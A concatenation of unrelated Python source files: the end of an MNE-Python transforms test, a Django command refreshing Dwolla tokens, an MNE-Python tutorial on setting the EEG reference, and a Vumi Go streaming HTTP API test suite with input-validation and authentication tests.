                    # XXX this angtol is not great but there is a hard to
                    # identify linalg/angle calculation bug on Travis...
                    angtol, dtol, stol = 180, 70, 3
                else:
                    angtol, dtol, stol = 50, 70, 3
            est, scale_est = _check_fit_matched_points(
                fro, to, weights=weights, do_scale=do_scale,
                angtol=angtol, dtol=dtol, stol=stol)
            assert not np.allclose(est[:3], quat, atol=1e-5)
            assert not np.allclose(est[3:], translation, atol=1e-5)
            angle = np.rad2deg(_angle_between_quats(est[:3], quat))
            assert_array_less(angle_bounds[0], angle)
            assert_array_less(angle, angle_bounds[1])
            dist = np.linalg.norm(est[3:] - translation)
            assert_array_less(dist_bounds[0], dist)
            assert_array_less(dist, dist_bounds[1])


def test_euler(quats):
    """Test euler transformations."""
    euler = _quat_to_euler(quats)
    quats_2 = _euler_to_quat(euler)
    assert_allclose(quats, quats_2, atol=1e-14)
    quat_rot = quat_to_rot(quats)
    euler_rot = np.array([rotation(*e)[:3, :3] for e in euler])
    assert_allclose(quat_rot, euler_rot, atol=1e-14)


@requires_nibabel()
@requires_dipy()
@pytest.mark.slowtest
@testing.requires_testing_data
def test_volume_registration():
    """Test volume registration."""
    import nibabel as nib
    from dipy.align import resample
    T1 = nib.load(fname_t1)
    affine = np.eye(4)
    affine[0, 3] = 10
    T1_resampled = resample(moving=T1.get_fdata(),
                            static=T1.get_fdata(),
                            moving_affine=T1.affine,
                            static_affine=T1.affine,
                            between_affine=np.linalg.inv(affine))
    for pipeline in ('rigids', ('translation', 'sdr')):
        reg_affine, sdr_morph = mne.transforms.compute_volume_registration(
            T1_resampled, T1, pipeline=pipeline, zooms=10, niter=[5])
        assert_allclose(affine, reg_affine, atol=0.25)
        T1_aligned = mne.transforms.apply_volume_registration(
            T1_resampled, T1, reg_affine, sdr_morph)
        r2 = _compute_r2(_get_img_fdata(T1_aligned), _get_img_fdata(T1))
        assert 99.9 < r2

    # check that all orders of the pipeline work
    for pipeline_len in range(1, 5):
        for pipeline in itertools.combinations(
                ('translation', 'rigid', 'affine', 'sdr'), pipeline_len):
            _validate_pipeline(pipeline)
            _validate_pipeline(list(pipeline))

    with pytest.raises(ValueError, match='Steps in pipeline are out of order'):
        _validate_pipeline(('sdr', 'affine'))

    with pytest.raises(ValueError,
                       match='Steps in pipeline should not be repeated'):
        _validate_pipeline(('affine', 'affine'))

from optparse import make_option

from django.core.management.base import BaseCommand, CommandError

from brambling.utils.payment import dwolla_update_tokens


class Command(BaseCommand):
    option_list = BaseCommand.option_list + (
        make_option(
            '--days',
            action='store',
            dest='days',
            default=15,
            help='Number of days ahead of time to update refresh tokens.'),
        )

    def handle(self, *args, **options):
        try:
            days = int(options['days'])
        except ValueError:
            raise CommandError("Days must be an integer value.")
        self.stdout.write("Updating dwolla tokens...")
        self.stdout.flush()
        count, test_count = dwolla_update_tokens(days)
        self.stdout.write("Test tokens updated: {}".format(count))
        self.stdout.write("Live tokens updated: {}".format(test_count))
        self.stdout.flush()

# -*- coding: utf-8 -*-
"""
.. _tut-set-eeg-ref:

Setting the EEG reference
=========================

This tutorial describes how to set or change the EEG reference in MNE-Python.

.. contents:: Page contents
   :local:
   :depth: 2

As usual we'll start by importing the modules we need, loading some
:ref:`example data <sample-dataset>`, and cropping it to save memory. Since
this tutorial deals specifically with EEG, we'll also restrict the dataset to
just a few EEG channels so the plots are easier to see:
"""

import os
import mne

sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
                                    'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file, verbose=False)
raw.crop(tmax=60).load_data()
raw.pick(['EEG 0{:02}'.format(n) for n in range(41, 60)])

###############################################################################
# Background
# ^^^^^^^^^^
#
# EEG measures a voltage (difference in electric potential) between each
# electrode and a reference electrode. This means that whatever signal is
# present at the reference electrode is effectively subtracted from all the
# measurement electrodes. Therefore, an ideal reference signal is one that
# captures *none* of the brain-specific fluctuations in electric potential,
# while capturing *all* of the environmental noise/interference that is being
# picked up by the measurement electrodes.
#
# In practice, this means that the reference electrode is often placed in a
# location on the subject's body and close to their head (so that any
# environmental interference affects the reference and measurement electrodes
# similarly) but as far away from the neural sources as possible (so that the
# reference signal doesn't pick up brain-based fluctuations). Typical reference
# locations are the subject's earlobe, nose, mastoid process, or collarbone.
# Each of these has advantages and disadvantages regarding how much brain
# signal it picks up (e.g., the mastoids pick up a fair amount compared to the
# others), and regarding the environmental noise it picks up (e.g., earlobe
# electrodes may shift easily, and have signals more similar to electrodes on
# the same side of the head).
#
# Even in cases where no electrode is specifically designated as the reference,
# EEG recording hardware will still treat one of the scalp electrodes as the
# reference, and the recording software may or may not display it to you (it
# might appear as a completely flat channel, or the software might subtract out
# the average of all signals before displaying, making it *look like* there is
# no reference).
#
#
# Setting or changing the reference channel
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you want to recompute your data with a different reference than was used
# when the raw data were recorded and/or saved, MNE-Python provides the
# :meth:`~mne.io.Raw.set_eeg_reference` method on :class:`~mne.io.Raw` objects
# as well as the :func:`mne.add_reference_channels` function. To use an
# existing channel as the new reference, use the
# :meth:`~mne.io.Raw.set_eeg_reference` method; you can also designate multiple
# existing electrodes as reference channels, as is sometimes done with mastoid
# references:

# code lines below are commented out because the sample data doesn't have
# earlobe or mastoid channels, so this is just for demonstration purposes:

# use a single channel reference (left earlobe)
# raw.set_eeg_reference(ref_channels=['A1'])

# use average of mastoid channels as reference
# raw.set_eeg_reference(ref_channels=['M1', 'M2'])

###############################################################################
# If a scalp electrode was used as reference but was not saved alongside the
# raw data (reference channels often aren't), you may wish to add it back to
# the dataset before re-referencing. For example, if your EEG system recorded
# with channel ``Fp1`` as the reference but did not include ``Fp1`` in the data
# file, using :meth:`~mne.io.Raw.set_eeg_reference` to set (say) ``Cz`` as the
# new reference will then subtract out the signal at ``Cz`` *without restoring
# the signal at* ``Fp1``. In this situation, you can add back ``Fp1`` as a flat
# channel prior to re-referencing using :func:`~mne.add_reference_channels`.
# (Since our example data doesn't use the `10-20 electrode naming system`_, the
# example below adds ``EEG 999`` as the missing reference, then sets the
# reference to ``EEG 050``.) Here's how the data looks in its original state:

raw.plot()

###############################################################################
# By default, :func:`~mne.add_reference_channels` returns a copy, so we can go
# back to our original ``raw`` object later. If you wanted to alter the
# existing :class:`~mne.io.Raw` object in-place you could specify
# ``copy=False``.

# add new reference channel (all zero)
raw_new_ref = mne.add_reference_channels(raw, ref_channels=['EEG 999'])
raw_new_ref.plot()

###############################################################################
# .. KEEP THESE BLOCKS SEPARATE SO FIGURES ARE BIG ENOUGH TO READ

# set reference to `EEG 050`
raw_new_ref.set_eeg_reference(ref_channels=['EEG 050'])
raw_new_ref.plot()

###############################################################################
# Notice that the new reference (``EEG 050``) is now flat, while the original
# reference channel that we added back to the data (``EEG 999``) has a non-zero
# signal. Notice also that ``EEG 053`` (which is marked as "bad" in
# ``raw.info['bads']``) is not affected by the re-referencing.
#
#
# Setting average reference
# ^^^^^^^^^^^^^^^^^^^^^^^^^
#
# To set a "virtual reference" that is the average of all channels, you can use
# :meth:`~mne.io.Raw.set_eeg_reference` with ``ref_channels='average'``. Just
# as above, this will not affect any channels marked as "bad", nor will it
# include bad channels when computing the average. However, it does modify the
# :class:`~mne.io.Raw` object in-place, so we'll make a copy first so we can
# still go back to the unmodified :class:`~mne.io.Raw` object later:

# sphinx_gallery_thumbnail_number = 4
# use the average of all channels as reference
raw_avg_ref = raw.copy().set_eeg_reference(ref_channels='average')
raw_avg_ref.plot()

###############################################################################
# Creating the average reference as a projector
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If using an average reference, it is possible to create the reference as a
# :term:`projector` rather than subtracting the reference from the data
# immediately by specifying ``projection=True``:

raw.set_eeg_reference('average', projection=True)
print(raw.info['projs'])

###############################################################################
# Creating the average reference as a projector has a few advantages:
#
# 1. It is possible to turn projectors on or off when plotting, so it is easy
#    to visualize the effect that the average reference has on the data.
#
# 2. If additional channels are marked as "bad" or if a subset of channels are
#    later selected, the projector will be re-computed to take these changes
#    into account (thus guaranteeing that the signal is zero-mean).
#
# 3. If there are other unapplied projectors affecting the EEG channels (such
#    as SSP projectors for removing heartbeat or blink artifacts), EEG
#    re-referencing cannot be performed until those projectors are either
#    applied or removed; adding the EEG reference as a projector is not subject
#    to that constraint. (The reason this wasn't a problem when we applied the
#    non-projector average reference to ``raw_avg_ref`` above is that the
#    empty-room projectors included in the sample data :file:`.fif` file were
#    only computed for the magnetometers.)

for title, proj in zip(['Original', 'Average'], [False, True]):
    fig = raw.plot(proj=proj, n_channels=len(raw))
    # make room for title
    fig.subplots_adjust(top=0.9)
    fig.suptitle('{} reference'.format(title), size='xx-large', weight='bold')

###############################################################################
# EEG reference and source modeling
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you plan to perform source modeling (either with EEG or combined EEG/MEG
# data), it is **strongly recommended** to use the
# average-reference-as-projection approach. It is important to use an average
# reference because using a specific
# reference sensor (or even an average of a few sensors) spreads the forward
# model error from the reference sensor(s) into all sensors, effectively
# amplifying the importance of the reference sensor(s) when computing source
# estimates. In contrast, using the average of all EEG channels as reference
# spreads the forward modeling error evenly across channels, so no one channel
# is weighted more strongly during source estimation. See also this `FieldTrip
# FAQ on average referencing`_ for more information.
#
# The main reason for specifying the average reference as a projector was
# mentioned in the previous section: an average reference projector adapts if
# channels are dropped, ensuring that the signal will always be zero-mean when
# the source modeling is performed. In contrast, applying an average reference
# by the traditional subtraction method offers no such guarantee.
#
# For these reasons, when performing inverse imaging, *MNE-Python will
# automatically average-reference the EEG channels if they are present and no
# reference strategy has been specified*. If you want to perform inverse
# imaging and do not want to use an average reference (and hence you accept the
# risks presented in the previous paragraphs), you can force MNE-Python to
# relax its average reference requirement by passing an empty list to
# :meth:`~mne.io.Raw.set_eeg_reference` (i.e., by calling
# ``raw.set_eeg_reference(ref_channels=[])``) prior to performing inverse
# imaging.
#
#
# .. LINKS
#
# .. _`FieldTrip FAQ on average referencing`:
#    http://www.fieldtriptoolbox.org/faq/why_should_i_use_an_average_reference_for_eeg_source_reconstruction/
# .. _`10-20 electrode naming system`:
#    https://en.wikipedia.org/wiki/10%E2%80%9320_system_(EEG)

import base64
import json

from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from twisted.web.http_headers import Headers
from twisted.web import http
from twisted.web.server import NOT_DONE_YET

from vumi.config import ConfigContext
from vumi.message import TransportUserMessage, TransportEvent
from vumi.tests.helpers import VumiTestCase
from vumi.tests.utils import MockHttpServer, LogCatcher
from vumi.transports.vumi_bridge.client import StreamingClient
from vumi.utils import http_request_full

from go.apps.http_api.resource import (
    StreamResourceMixin, StreamingConversationResource)
from go.apps.tests.helpers import AppWorkerHelper
from go.apps.http_api.vumi_app import StreamingHTTPWorker


class TestStreamingHTTPWorker(VumiTestCase):

    @inlineCallbacks
    def setUp(self):
        self.app_helper = self.add_helper(AppWorkerHelper(StreamingHTTPWorker))

        self.config = {
            'health_path': '/health/',
            'web_path': '/foo',
            'web_port': 0,
            'metrics_prefix': 'metrics_prefix.',
            'conversation_cache_ttl': 0,
        }
        self.app = yield self.app_helper.get_app_worker(self.config)
        self.addr = self.app.webserver.getHost()
        self.url = 'http://%s:%s%s' % (
            self.addr.host, self.addr.port, self.config['web_path'])

        conv_config = {
            'http_api': {
                'api_tokens': [
                    'token-1',
                    'token-2',
                    'token-3',
                ],
                'metric_store': 'metric_store',
            }
        }
        conversation = yield self.app_helper.create_conversation(
            config=conv_config)
        yield self.app_helper.start_conversation(conversation)
        self.conversation = yield self.app_helper.get_conversation(
            conversation.key)

        self.auth_headers = {
            'Authorization': ['Basic ' + base64.b64encode('%s:%s' % (
                conversation.user_account.key, 'token-1'))],
        }

        self.client = StreamingClient()

        # Mock server to test HTTP posting of inbound messages & events
        self.mock_push_server = MockHttpServer(self.handle_request)
        yield self.mock_push_server.start()
        self.add_cleanup(self.mock_push_server.stop)
        self.push_calls = DeferredQueue()
        self._setup_wait_for_request()
        self.add_cleanup(self._wait_for_requests)

    def _setup_wait_for_request(self):
        # Hackery to wait for the request to finish
        self._req_state = {
            'queue': DeferredQueue(),
            'expected': 0,
        }
        orig_track = StreamingConversationResource.track_request
        orig_release = StreamingConversationResource.release_request

        def track_wrapper(*args, **kw):
            self._req_state['expected'] += 1
            return orig_track(*args, **kw)

        def release_wrapper(*args, **kw):
            return orig_release(*args, **kw).addCallback(
                self._req_state['queue'].put)

        self.patch(
            StreamingConversationResource, 'track_request', track_wrapper)
        self.patch(
            StreamingConversationResource, 'release_request', release_wrapper)

    @inlineCallbacks
    def _wait_for_requests(self):
        while self._req_state['expected'] > 0:
            yield self._req_state['queue'].get()
            self._req_state['expected'] -= 1

    def handle_request(self, request):
        self.push_calls.put(request)
        return NOT_DONE_YET

    @inlineCallbacks
    def pull_message(self, count=1):
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        messages = DeferredQueue()
        errors = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, messages.put, errors.put, url,
            Headers(self.auth_headers))

        received_messages = []
        for msg_id in range(count):
            yield self.app_helper.make_dispatch_inbound(
                'in %s' % (msg_id,), message_id=str(msg_id),
                conv=self.conversation)
            recv_msg = yield messages.get()
            received_messages.append(recv_msg)

        receiver.disconnect()
        returnValue((receiver, received_messages))

    def assert_bad_request(self, response, reason):
        self.assertEqual(response.code, http.BAD_REQUEST)
        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        data = json.loads(response.delivered_body)
        self.assertEqual(data, {
            "success": False,
            "reason": reason,
        })

    @inlineCallbacks
    def test_proxy_buffering_headers_off(self):
        # This is the default, but we patch it anyway to make sure we're
        # testing the right thing should the default change.
        self.patch(StreamResourceMixin, 'proxy_buffering', False)
        receiver, received_messages = yield self.pull_message()
        headers = receiver._response.headers
        self.assertEqual(headers.getRawHeaders('x-accel-buffering'), ['no'])

    @inlineCallbacks
    def test_proxy_buffering_headers_on(self):
        self.patch(StreamResourceMixin, 'proxy_buffering', True)
        receiver, received_messages = yield self.pull_message()
        headers = receiver._response.headers
        self.assertEqual(headers.getRawHeaders('x-accel-buffering'), ['yes'])

    @inlineCallbacks
    def test_content_type(self):
        receiver, received_messages = yield self.pull_message()
        headers = receiver._response.headers
        self.assertEqual(
            headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])

    @inlineCallbacks
    def test_messages_stream(self):
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        messages = DeferredQueue()
        errors = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, messages.put, errors.put, url,
            Headers(self.auth_headers))

        msg1 = yield self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        msg2 = yield self.app_helper.make_dispatch_inbound(
            'in 2', message_id='2', conv=self.conversation)

        rm1 = yield messages.get()
        rm2 = yield messages.get()

        receiver.disconnect()

        # Sometimes messages arrive out of order if we're hitting real redis.
        rm1, rm2 = sorted([rm1, rm2], key=lambda m: m['message_id'])

        self.assertEqual(msg1['message_id'], rm1['message_id'])
        self.assertEqual(msg2['message_id'], rm2['message_id'])
        self.assertEqual(errors.size, None)

    @inlineCallbacks
    def test_events_stream(self):
        url = '%s/%s/events.json' % (self.url, self.conversation.key)

        events = DeferredQueue()
        errors = DeferredQueue()
        receiver = yield self.client.stream(TransportEvent, events.put,
                                            events.put, url,
                                            Headers(self.auth_headers))

        msg1 = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 1', message_id='1')
        ack1 = yield self.app_helper.make_dispatch_ack(
            msg1, conv=self.conversation)

        msg2 = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 2', message_id='2')
        ack2 = yield self.app_helper.make_dispatch_ack(
            msg2, conv=self.conversation)

        ra1 = yield events.get()
        ra2 = yield events.get()

        receiver.disconnect()

        # Sometimes messages arrive out of order if we're hitting real redis.
        if ra1['event_id'] != ack1['event_id']:
            ra1, ra2 = ra2, ra1

        self.assertEqual(ack1['event_id'], ra1['event_id'])
        self.assertEqual(ack2['event_id'], ra2['event_id'])
        self.assertEqual(errors.size, None)

    @inlineCallbacks
    def test_missing_auth(self):
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        queue = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url)
        response = yield receiver.get_response()
        self.assertEqual(response.code, http.UNAUTHORIZED)
        self.assertEqual(response.headers.getRawHeaders('www-authenticate'), [
            'basic realm="Conversation Realm"'])

    @inlineCallbacks
    def test_invalid_auth(self):
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        queue = DeferredQueue()

        headers = Headers({
            'Authorization': ['Basic %s' % (base64.b64encode('foo:bar'),)],
        })

        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url, headers)
        response = yield receiver.get_response()
        self.assertEqual(response.code, http.UNAUTHORIZED)
        self.assertEqual(response.headers.getRawHeaders('www-authenticate'), [
            'basic realm="Conversation Realm"'])

    @inlineCallbacks
    def test_send_to(self):
        msg = {
            'to_addr': '+2345',
            'content': 'foo',
            'message_id': 'evil_id',
        }

        # TaggingMiddleware.add_tag_to_msg(msg, self.tag)

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        self.assertEqual(response.code, http.OK)
        put_msg = json.loads(response.delivered_body)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(sent_msg['to_addr'], sent_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        })
        # We do not respect the message_id that's been given.
        self.assertNotEqual(sent_msg['message_id'], msg['message_id'])
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['to_addr'], msg['to_addr'])
        self.assertEqual(sent_msg['from_addr'], None)

    @inlineCallbacks
    def test_send_to_within_content_length_limit(self):
        self.conversation.config['http_api'].update({
            'content_length_limit': 182,
        })
        yield self.conversation.save()

        msg = {
            'content': 'foo',
            'to_addr': '+1234',
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        })
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], '+1234')
        self.assertEqual(sent_msg['from_addr'], None)

    @inlineCallbacks
    def test_send_to_content_too_long(self):
        self.conversation.config['http_api'].update({
            'content_length_limit': 10,
        })
        yield self.conversation.save()

        msg = {
            'content': "This message is longer than 10 characters.",
            'to_addr': '+1234',
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, json.dumps(msg), self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Payload content too long: 42 > 10")

    @inlineCallbacks
    def test_send_to_with_evil_content(self):
        msg = {
            'content': 0xBAD,
            'to_addr': '+1234',
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'content'")

    @inlineCallbacks
    def test_send_to_with_evil_to_addr(self):
        msg = {
            'content': 'good',
            'to_addr': 1234,
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'to_addr'")

    @inlineCallbacks
    def test_in_reply_to(self):
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        })
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_in_reply_to_within_content_length_limit(self):
        self.conversation.config['http_api'].update({
            'content_length_limit': 182,
        })
        yield self.conversation.save()

        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        })
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_in_reply_to_content_too_long(self):
        self.conversation.config['http_api'].update({
            'content_length_limit': 10,
        })
        yield self.conversation.save()

        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': "This message is longer than 10 characters.",
            'in_reply_to': inbound_msg['message_id'],
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, json.dumps(msg), self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Payload content too long: 42 > 10")

    @inlineCallbacks
    def test_in_reply_to_with_evil_content(self):
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 0xBAD,
            'in_reply_to': inbound_msg['message_id'],
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'content'")

    @inlineCallbacks
    def test_invalid_in_reply_to(self):
        msg = {
            'content': 'foo',
            'in_reply_to': '1',  # this doesn't exist
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')
        self.assert_bad_request(response, 'Invalid in_reply_to value')

    @inlineCallbacks
    def test_invalid_in_reply_to_with_missing_conversation_key(self):
        # create a message with no conversation
        inbound_msg = self.app_helper.make_inbound('in 1', message_id='msg-1')
        vumi_api = self.app_helper.vumi_helper.get_vumi_api()
        yield vumi_api.mdb.add_inbound_message(inbound_msg)

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        with LogCatcher(message='Invalid reply to message <Message .*>'
                        ' which has no conversation key') as lc:
            response = yield http_request_full(url, json.dumps(msg),
                                               self.auth_headers, method='PUT')
            [error_log] = lc.messages()

        self.assert_bad_request(response, "Invalid in_reply_to value")
        self.assertTrue(inbound_msg['message_id'] in error_log)

    @inlineCallbacks
    def test_in_reply_to_with_evil_session_event(self):
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
            'session_event': 0xBAD5E55104,
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assert_bad_request(
            response,
            "Invalid or missing value for payload key 'session_event'")
        self.assertEqual(self.app_helper.get_dispatched_outbound(), [])

    @inlineCallbacks
    def test_in_reply_to_with_evil_message_id(self):
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
            'message_id': 'evil_id'
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assertEqual(response.code, http.OK)
        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        [sent_msg] = self.app_helper.get_dispatched_outbound()

        # We do not respect the message_id that's been given.
        self.assertNotEqual(sent_msg['message_id'], msg['message_id'])
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_metric_publishing(self):

        metric_data = [
            ("vumi.test.v1", 1234, 'SUM'),
            ("vumi.test.v2", 3456, 'AVG'),
        ]

        url = '%s/%s/metrics.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, json.dumps(metric_data), self.auth_headers, method='PUT')

        self.assertEqual(response.code, http.OK)
        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])

        prefix = "go.campaigns.test-0-user.stores.metric_store"

        self.assertEqual(
            self.app_helper.get_published_metrics(self.app),
            [("%s.vumi.test.v1" % prefix, 1234),
             ("%s.vumi.test.v2" % prefix, 3456)])

    @inlineCallbacks
    def test_concurrency_limits(self):
        config = yield self.app.get_config(None)
        concurrency = config.concurrency_limit
        queue = DeferredQueue()
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        max_receivers = [self.client.stream(
            TransportUserMessage, queue.put, queue.put, url,
            Headers(self.auth_headers)) for _ in range(concurrency)]

        for i in range(concurrency):
            msg = yield self.app_helper.make_dispatch_inbound(
                'in %s' % (i,), message_id=str(i), conv=self.conversation)
            received = yield queue.get()
            self.assertEqual(msg['message_id'], received['message_id'])

        maxed_out_resp = yield http_request_full(
            url, method='GET', headers=self.auth_headers)

        self.assertEqual(maxed_out_resp.code, 403)
        self.assertTrue(
            'Too many concurrent connections' in maxed_out_resp.delivered_body)

        [r.disconnect() for r in max_receivers]

    @inlineCallbacks
    def test_disabling_concurrency_limit(self):
        conv_resource = StreamingConversationResource(
            self.app, self.conversation.key)
        # negative concurrency limit disables it
        ctxt = ConfigContext(user_account=self.conversation.user_account.key,
                             concurrency_limit=-1)
        config = yield self.app.get_config(msg=None, ctxt=ctxt)
        self.assertTrue(
            (yield conv_resource.is_allowed(
                config, self.conversation.user_account.key)))

    @inlineCallbacks
    def test_backlog_on_connect(self):
        for i in range(10):
            yield self.app_helper.make_dispatch_inbound(
                'in %s' % (i,), message_id=str(i), conv=self.conversation)

        queue = DeferredQueue()
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url,
            Headers(self.auth_headers))

        for i in range(10):
            received = yield queue.get()
            self.assertEqual(received['message_id'], str(i))

        receiver.disconnect()

    @inlineCallbacks
    def test_health_response(self):
        health_url = 'http://%s:%s%s' % (
            self.addr.host, self.addr.port, self.config['health_path'])

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '0')

        yield self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        queue = DeferredQueue()
        stream_url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        stream_receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, stream_url,
            Headers(self.auth_headers))

        yield queue.get()

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '1')

        stream_receiver.disconnect()

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '0')

        self.assertEqual(self.app.client_manager.clients, {
            'sphex.stream.message.%s' % (self.conversation.key,): []
        })

    @inlineCallbacks
    def test_post_inbound_message(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        msg_d = self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        req = yield self.push_calls.get()
        posted_json_data = req.content.read()
        req.finish()
        msg = yield msg_d

        posted_msg = TransportUserMessage.from_json(posted_json_data)
        self.assertEqual(posted_msg['message_id'], msg['message_id'])

    @inlineCallbacks
    def test_post_inbound_message_201_response(self):
